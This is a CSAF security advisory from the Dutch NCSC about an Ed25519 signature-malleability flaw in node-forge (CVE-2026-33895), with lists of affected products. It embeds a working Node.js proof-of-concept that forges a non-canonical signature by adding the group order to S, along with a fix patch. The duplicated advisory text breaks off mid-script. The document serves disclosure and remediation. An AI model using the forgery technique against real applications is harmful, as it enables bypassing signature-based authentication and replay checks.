{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-33895",
        "tracking": {
            "current_release_date": "2026-03-31T19:39:29.113645Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-33895",
            "initial_release_date": "2026-03-26T22:54:46.938960Z",
            "revision_history": [
                {
                    "date": "2026-03-26T22:54:46.938960Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (6).| CWES updated (1)."
                },
                {
                    "date": "2026-03-26T22:54:50.708949Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-27T00:20:52.050350Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (5).| CWES updated (1)."
                },
                {
                    "date": "2026-03-27T00:20:54.335638Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-27T07:34:56.686996Z",
                    "number": "5",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-28T07:38:05.552034Z",
                    "number": "6",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-28T07:39:04.752053Z",
                    "number": "7",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-28T07:39:14.786334Z",
                    "number": "8",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-28T07:40:46.544805Z",
                    "number": "9",
                    "summary": "References created (1)."
                },
                {
                    "date": "2026-03-28T12:28:11.528780Z",
                    "number": "10",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (36).| Product Identifiers created (13).| Product Remediations created (36).| References created (5).| CWES updated (1).| Vendor_assessment created."
                },
                {
                    "date": "2026-03-28T12:28:20.179510Z",
                    "number": "11",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-29T00:38:38.834552Z",
                    "number": "12",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-29T00:38:49.146847Z",
                    "number": "13",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-31T12:19:56.885861Z",
                    "number": "14",
                    "summary": "Source connected.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-31T19:39:07.409593Z",
                    "number": "15",
                    "summary": "Unknown change."
                }
            ],
            "status": "interim",
            "version": "15"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/4",
                                "product": {
                                    "name": "vers:rpm/4",
                                    "product_id": "CSAFPID-2552001",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:cryostat:4"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Cryostat 4"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/5",
                                "product": {
                                    "name": "vers:rpm/5",
                                    "product_id": "CSAFPID-1459353",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:logging:5"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Logging Subsystem for Red Hat OpenShift"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/2",
                                "product": {
                                    "name": "vers:rpm/2",
                                    "product_id": "CSAFPID-1508257",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:ansible_automation_platform:2"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Ansible Automation Platform 2"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/1",
                                "product": {
                                    "name": "vers:rpm/1",
                                    "product_id": "CSAFPID-5940623",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:podman_desktop:1"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Build of Podman Desktop"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/8",
                                "product": {
                                    "name": "vers:rpm/8",
                                    "product_id": "CSAFPID-1439292",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:jboss_data_grid:8"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Data Grid 8"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/10",
                                "product": {
                                    "name": "vers:rpm/10",
                                    "product_id": "CSAFPID-2858634",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/o:redhat:enterprise_linux:10"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Enterprise Linux 10"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/8",
                                "product": {
                                    "name": "vers:rpm/8",
                                    "product_id": "CSAFPID-1439317",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/o:redhat:enterprise_linux:8"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Enterprise Linux 8"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/9",
                                "product": {
                                    "name": "vers:rpm/9",
                                    "product_id": "CSAFPID-1439319",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/o:redhat:enterprise_linux:9"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Enterprise Linux 9"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/7",
                                "product": {
                                    "name": "vers:rpm/7",
                                    "product_id": "CSAFPID-1439294",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:jboss_fuse:7"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Fuse 7"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/7",
                                "product": {
                                    "name": "vers:rpm/7",
                                    "product_id": "CSAFPID-1439306",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:jboss_enterprise_bpms_platform:7"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Process Automation 7"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/3",
                                "product": {
                                    "name": "vers:rpm/3",
                                    "product_id": "CSAFPID-1441200",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:quay:3"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Quay 3"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/4",
                                "product": {
                                    "name": "vers:rpm/4",
                                    "product_id": "CSAFPID-2467441",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:rhboac_hawtio:4"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat build of Apache Camel - HawtIO 4"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/2",
                                "product": {
                                    "name": "vers:rpm/2",
                                    "product_id": "CSAFPID-2467443",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:service_registry:2"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat build of Apicurio Registry 2"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1837472"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "automation-eda-controller"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1837473"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "automation-gateway"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5222698"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "automation-platform-ui"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Ansible Automation Platform 2"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5187689"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "elasticsearch-operator-bundle"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2914696"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "elasticsearch-proxy-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2914697"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "elasticsearch-rhel9-operator"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2855724"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "elasticsearch6-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1459355"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "kibana6-rhel8"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2855725"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "logging-curator5-rhel9"
                            }
                        ],
                        "category": "product_family",
                        "name": "Logging Subsystem for Red Hat OpenShift"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2868420"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "grafana"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Enterprise Linux 10"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1496261"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "grafana"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2109953"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "pcs"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Enterprise Linux 9"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2467444"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "io.apicurio-apicurio-registry"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat build of Apicurio Registry 2"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2467448"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "io.apicurio-apicurito"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1771999"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "io.syndesis-syndesis-parent"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Fuse 7"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2698055"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "io.cryostat-cryostat"
                            }
                        ],
                        "category": "product_family",
                        "name": "Cryostat 4"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2467442"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "io.hawt-project"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat build of Apache Camel - HawtIO 4"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2467445"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "org.infinispan-infinispan-console"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Data Grid 8"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2698057"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "org.uberfire-uberfire-parent"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Process Automation 7"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2109952"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "pcs"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Enterprise Linux 8"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5940626"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "podman-desktop-macos-1"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5940629"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "podman-desktop-windows-1"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Build of Podman Desktop"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1455906"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "quay-rhel8"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Quay 3"
                    }
                ],
                "category": "vendor",
                "name": "Red Hat"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<1.4.0",
                                "product": {
                                    "name": "vers:unknown/<1.4.0",
                                    "product_id": "CSAFPID-5956281"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Forge"
                    }
                ],
                "category": "vendor",
                "name": "Digital Bazaar"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:microsoft/*",
                                        "product": {
                                            "name": "vers:microsoft/*",
                                            "product_id": "CSAFPID-5197899",
                                            "product_identification_helper": {
                                                "cpe": "cpe:2.3:a:microsoft:azl3_python-tensorboard_2.16.2-6:*:*:*:*:*:*:*:*"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "azl3 python-tensorboard 2.16.2-6 on Azure Linux 3.0"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:microsoft/*",
                                        "product": {
                                            "name": "vers:microsoft/*",
                                            "product_id": "CSAFPID-5733329",
                                            "product_identification_helper": {
                                                "cpe": "cpe:2.3:a:microsoft:cbl2_reaper_3.1.1-22:*:*:*:*:*:*:*:*"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "cbl2 reaper 3.1.1-22 on CBL Mariner 2.0"
                            }
                        ],
                        "category": "product_family",
                        "name": "Open Source Software"
                    }
                ],
                "category": "vendor",
                "name": "Microsoft"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<1.4.0",
                                "product": {
                                    "name": "vers:unknown/>=0|<1.4.0",
                                    "product_id": "CSAFPID-5920253"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "node-forge"
                    }
                ],
                "category": "vendor",
                "name": "digitalbazaar"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-33895",
            "cwe": {
                "id": "CWE-347",
                "name": "Improper Verification of Cryptographic Signature"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "## Summary\nEd25519 signature verification accepts forged non-canonical signatures where the scalar S is not reduced modulo the group order (`S >= L`). A valid signature and its `S + L` variant both verify in forge, while Node.js `crypto.verify` (OpenSSL-backed) rejects the `S + L` variant, [as defined by the specification](https://datatracker.ietf.org/doc/html/rfc8032#section-8.4). This class of signature malleability has been exploited in practice to bypass authentication and authorization logic (see [CVE-2026-25793](https://nvd.nist.gov/vuln/detail/CVE-2026-25793), [CVE-2022-35961](https://nvd.nist.gov/vuln/detail/CVE-2022-35961)). Logic in applications that relies on signature uniqueness (e.g., deduplication by signature bytes, replay tracking, signed-object canonicalization checks) may be bypassed.\n\n## Impacted Deployments\n**Tested commit:** `8e1d527fe8ec2670499068db783172d4fb9012e5`\n**Affected versions:** tested on v1.3.3 (latest release) and all versions since Ed25519 was implemented.\n\n**Configuration assumptions:**\n- Default forge Ed25519 verify API path (`ed25519.verify(...)`).\n\n\n## Root Cause\nIn `lib/ed25519.js`, `crypto_sign_open(...)` uses the signature's last 32 bytes (`S`) directly in scalar multiplication:\n\n```javascript\nscalarbase(q, sm.subarray(32));\n```\n\nThere is no prior check enforcing `S < L` (Ed25519 group order). As a result, equivalent scalar classes can pass verification, including a modified signature where `S := S + L (mod 2^256)` when that value remains non-canonical. 
The PoC demonstrates this by mutating only the S half of a valid 64-byte signature.\n\n## Reproduction Steps\n- Use Node.js (tested with `v24.9.0`) and clone `digitalbazaar/forge` at commit `8e1d527fe8ec2670499068db783172d4fb9012e5`.\n- Place and run the PoC script (`poc.js`) with `node poc.js` in the same level as the `forge` folder.\n- The script generates an Ed25519 keypair via forge, signs a fixed message, mutates the signature by adding Ed25519 order L to S (bytes 32..63), and verifies both original and tweaked signatures with forge and Node/OpenSSL (`crypto.verify`).\n- Confirm output includes:\n\n```json\n{\n\t\"forge\": {\n\t\t\"original_valid\": true,\n\t\t\"tweaked_valid\": true\n\t},\n\t\"crypto\": {\n\t\t\"original_valid\": true,\n\t\t\"tweaked_valid\": false\n\t}\n}\n```\n\n## Proof of Concept\n\n**Overview:**\n- Demonstrates a valid control signature and a forged (S + L) signature in one run.\n- Uses Node/OpenSSL as a differential verification baseline.\n- Observed output on tested commit:\n\n```text\n{\n    \"forge\": {\n        \"original_valid\": true,\n        \"tweaked_valid\": true\n    },\n    \"crypto\": {\n        \"original_valid\": true,\n        \"tweaked_valid\": false\n    }\n}\n```\n\n<details><summary>poc.js</summary>\n\n```javascript\n#!/usr/bin/env node\n'use strict';\n\nconst path = require('path');\nconst crypto = require('crypto');\nconst forge = require('./forge');\nconst ed = forge.ed25519;\n\nconst MESSAGE = Buffer.from('dderpym is the coolest man alive!');\n\n// Ed25519 group order L encoded as 32 bytes, little-endian (RFC 8032).\nconst ED25519_ORDER_L = Buffer.from([\n  0xed, 0xd3, 0xf5, 0x5c, 0x1a, 0x63, 0x12, 0x58,\n  0xd6, 0x9c, 0xf7, 0xa2, 0xde, 0xf9, 0xde, 0x14,\n  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10,\n]);\n\n// For Ed25519 signatures, s is the last 32 bytes of the 64-byte signature.\n// This returns a new signature with s := s + L (mod 2^256), plus the 
carry.\nfunction addLToS(signature) {\n  if (!Buffer.isBuffer(signature) || signature.length !== 64) {\n    throw new Error('signature must be a 64-byte Buffer');\n  }\n  const out = Buffer.from(signature);\n  let carry = 0;\n  for (let i = 0; i < 32; i++) {\n    const idx = 32 + i; // s starts at byte 32 in the 64-byte signature.\n    const sum = out[idx] + ED25519_ORDER_L[i] + carry;\n    out[idx] = sum & 0xff;\n    carry = sum >> 8;\n  }\n  return { sig: out, carry };\n}\n\nfunction toSpkiPem(publicKeyBytes) {\n  if (publicKeyBytes.length !== 32) {\n    throw new Error('publicKeyBytes must be 32 bytes');\n  }\n  // Builds an ASN.1 SubjectPublicKeyInfo for Ed25519 (RFC 8410) and returns PEM.\n  const oidEd25519 = Buffer.from([0x06, 0x03, 0x2b, 0x65, 0x70]);\n  const algId = Buffer.concat([Buffer.from([0x30, 0x05]), oidEd25519]);\n  const bitString = Buffer.concat([Buffer.from([0x03, 0x21, 0x00]), publicKeyBytes]);\n  const spki = Buffer.concat([Buffer.from([0x30, 0x2a]), algId, bitString]);\n  const b64 = spki.toString('base64').match(/.{1,64}/g).join('\\n');\n  return `-----BEGIN PUBLIC KEY-----\\n${b64}\\n-----END PUBLIC KEY-----\\n`;\n}\n\nfunction verifyWithCrypto(publicKey, message, signature) {\n  try {\n    const keyObject = crypto.createPublicKey(toSpkiPem(publicKey));\n    const ok = crypto.verify(null, message, keyObject, signature);\n    return { ok };\n  } catch (error) {\n    return { ok: false, error: error.message };\n  }\n}\n\nfunction toResult(label, original, tweaked) {\n  return {\n    [label]: {\n      original_valid: original.ok,\n      tweaked_valid: tweaked.ok,\n    },\n  };\n}\n\nfunction main() {\n  const kp = ed.generateKeyPair();\n  const sig = ed.sign({ message: MESSAGE, privateKey: kp.privateKey });\n  const ok = ed.verify({ message: MESSAGE, signature: sig, publicKey: kp.publicKey });\n  const tweaked = addLToS(sig);\n  const okTweaked = ed.verify({\n    message: MESSAGE,\n    signature: tweaked.sig,\n    publicKey: kp.publicKey,\n  
});\n  const cryptoOriginal = verifyWithCrypto(kp.publicKey, MESSAGE, sig);\n  const cryptoTweaked = verifyWithCrypto(kp.publicKey, MESSAGE, tweaked.sig);\n  const result = {\n    ...toResult('forge', { ok }, { ok: okTweaked }),\n    ...toResult('crypto', cryptoOriginal, cryptoTweaked),\n  };\n  console.log(JSON.stringify(result, null, 2));\n}\n\nmain();\n```\n</details>\n\n## Suggested Patch\nAdd strict canonical scalar validation in Ed25519 verify path before scalar multiplication. (Parse S as little-endian 32-byte integer and reject if `S >= L`).\n\nHere is a patch we tested on our end to resolve the issue, though please verify it on your end:\n\n```diff\nindex f3e6faa..87eb709 100644\n--- a/lib/ed25519.js\n+++ b/lib/ed25519.js\n@@ -380,6 +380,10 @@ function crypto_sign_open(m, sm, n, pk) {\n     return -1;\n   }\n\n+  if(!_isCanonicalSignatureScalar(sm, 32)) {\n+    return -1;\n+  }\n+\n   for(i = 0; i < n; ++i) {\n     m[i] = sm[i];\n   }\n@@ -409,6 +413,21 @@ function crypto_sign_open(m, sm, n, pk) {\n   return mlen;\n }\n\n+function _isCanonicalSignatureScalar(bytes, offset) {\n+  var i;\n+  // Compare little-endian scalar S against group order L and require S < L.\n+  for(i = 31; i >= 0; --i) {\n+    if(bytes[offset + i] < L[i]) {\n+      return true;\n+    }\n+    if(bytes[offset + i] > L[i]) {\n+      return false;\n+    }\n+  }\n+  // S == L is non-canonical.\n+  return false;\n+}\n+\n function modL(r, x) {\n   var carry, i, j, k;\n   for(i = 63; i >= 32; --i) {\n```\n\n## Resources\n\n- RFC 8032 (Ed25519): https://datatracker.ietf.org/doc/html/rfc8032#section-8.4\n  - > Ed25519 and Ed448 signatures are not malleable due to the verification check that decoded S is smaller than l\n\n\n## Credit\n\nThis vulnerability was discovered as part of a U.C. Berkeley security research project by: Austin Chu, Sohee Kim, and Corban Villa.",
                    "title": "github - https://api.github.com/advisories/GHSA-q67f-28xg-22rw"
                },
                {
                    "category": "description",
                    "text": "## Summary\nEd25519 signature verification accepts forged non-canonical signatures where the scalar S is not reduced modulo the group order (`S >= L`). A valid signature and its `S + L` variant both verify in forge, while Node.js `crypto.verify` (OpenSSL-backed) rejects the `S + L` variant, [as defined by the specification](https://datatracker.ietf.org/doc/html/rfc8032#section-8.4). This class of signature malleability has been exploited in practice to bypass authentication and authorization logic (see [CVE-2026-25793](https://nvd.nist.gov/vuln/detail/CVE-2026-25793), [CVE-2022-35961](https://nvd.nist.gov/vuln/detail/CVE-2022-35961)). Logic in applications that relies on signature uniqueness (e.g., deduplication by signature bytes, replay tracking, signed-object canonicalization checks) may be bypassed.\n\n## Impacted Deployments\n**Tested commit:** `8e1d527fe8ec2670499068db783172d4fb9012e5`\n**Affected versions:** tested on v1.3.3 (latest release) and all versions since Ed25519 was implemented.\n\n**Configuration assumptions:**\n- Default forge Ed25519 verify API path (`ed25519.verify(...)`).\n\n\n## Root Cause\nIn `lib/ed25519.js`, `crypto_sign_open(...)` uses the signature's last 32 bytes (`S`) directly in scalar multiplication:\n\n```javascript\nscalarbase(q, sm.subarray(32));\n```\n\nThere is no prior check enforcing `S < L` (Ed25519 group order). As a result, equivalent scalar classes can pass verification, including a modified signature where `S := S + L (mod 2^256)` when that value remains non-canonical. 
The PoC demonstrates this by mutating only the S half of a valid 64-byte signature.\n\n## Reproduction Steps\n- Use Node.js (tested with `v24.9.0`) and clone `digitalbazaar/forge` at commit `8e1d527fe8ec2670499068db783172d4fb9012e5`.\n- Place and run the PoC script (`poc.js`) with `node poc.js` in the same level as the `forge` folder.\n- The script generates an Ed25519 keypair via forge, signs a fixed message, mutates the signature by adding Ed25519 order L to S (bytes 32..63), and verifies both original and tweaked signatures with forge and Node/OpenSSL (`crypto.verify`).\n- Confirm output includes:\n\n```json\n{\n\t\"forge\": {\n\t\t\"original_valid\": true,\n\t\t\"tweaked_valid\": true\n\t},\n\t\"crypto\": {\n\t\t\"original_valid\": true,\n\t\t\"tweaked_valid\": false\n\t}\n}\n```\n\n## Proof of Concept\n\n**Overview:**\n- Demonstrates a valid control signature and a forged (S + L) signature in one run.\n- Uses Node/OpenSSL as a differential verification baseline.\n- Observed output on tested commit:\n\n```text\n{\n    \"forge\": {\n        \"original_valid\": true,\n        \"tweaked_valid\": true\n    },\n    \"crypto\": {\n        \"original_valid\": true,\n        \"tweaked_valid\": false\n    }\n}\n```\n\n<details><summary>poc.js</summary>\n\n```javascript\n#!/usr/bin/env node\n'use strict';\n\nconst path = require('path');\nconst crypto = require('crypto');\nconst forge = require('./forge');\nconst ed = forge.ed25519;\n\nconst MESSAGE = Buffer.from('dderpym is the coolest man alive!');\n\n// Ed25519 group order L encoded as 32 bytes, little-endian (RFC 8032).\nconst ED25519_ORDER_L = Buffer.from([\n  0xed, 0xd3, 0xf5, 0x5c, 0x1a, 0x63, 0x12, 0x58,\n  0xd6, 0x9c, 0xf7, 0xa2, 0xde, 0xf9, 0xde, 0x14,\n  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10,\n]);\n\n// For Ed25519 signatures, s is the last 32 bytes of the 64-byte signature.\n// This returns a new signature 